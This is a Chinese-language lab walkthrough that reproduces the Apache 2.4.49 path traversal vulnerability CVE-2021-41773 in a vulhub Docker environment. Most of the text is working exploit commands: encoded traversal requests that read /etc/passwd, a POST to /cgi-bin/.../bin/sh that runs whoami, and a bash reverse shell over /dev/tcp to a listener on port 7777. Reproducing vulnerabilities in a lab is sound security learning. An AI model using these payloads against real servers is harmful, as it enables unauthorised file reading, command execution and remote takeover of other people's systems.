漏洞介绍
在Apache 2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:
- 版本等于2.4.49
- 穿越的目录允许被访问,比如配置了
<Directory />Require all granted</Directory>
。(默认情况下是不允许的)
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
一、环境配置
监听机:kali 靶机:Ubuntu
首次尝试要先安装docker、docker-compose、vulhub
docker下载
curl -s https://get.docker.com/ | sh
Docker-compose下载:
curl -s https://bootstrap.pypa.io/get-pip.py | python3 //无pip,先安装pip
pip install docker-compose //有pip
vulhub下载:
git clone https://github.com/vulhub/vulhub.git
二、漏洞复现
启动环境前要先到对应的目录。如本次对CVE-2021-41773漏洞进行复现,先到vulhub/httpd/CVE-2021-41773目录下启动环境
启动环境
docker-compose up -d
访问ifconfig,查询自己的IP
浏览器访问ip:8080,看到it works!代表环境启动成功
构造payload实现路径穿越,获取passwd文件内容
curl -v --path-as-is http://ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Burpsuite中,获取passwd文件内容
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
获取当前用户
curl -v --data "echo;whoami" 'http://192.168.80.157:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
Burpsuit下输出当前用户
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
反弹shell
用kali监听7777端口
在Ubuntu中设置反弹shell
curl -v --data "echo;bash -c 'bash -i >& /dev/tcp/监听端ip/7777 0>&1'" 'http://ip/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
成功!
Burpsuite下反弹shell命令
echo;bash -c 'bash -i >& /dev/tcp/192.168.80.133/7777 0>&1';
最后关闭环境
docker-compose down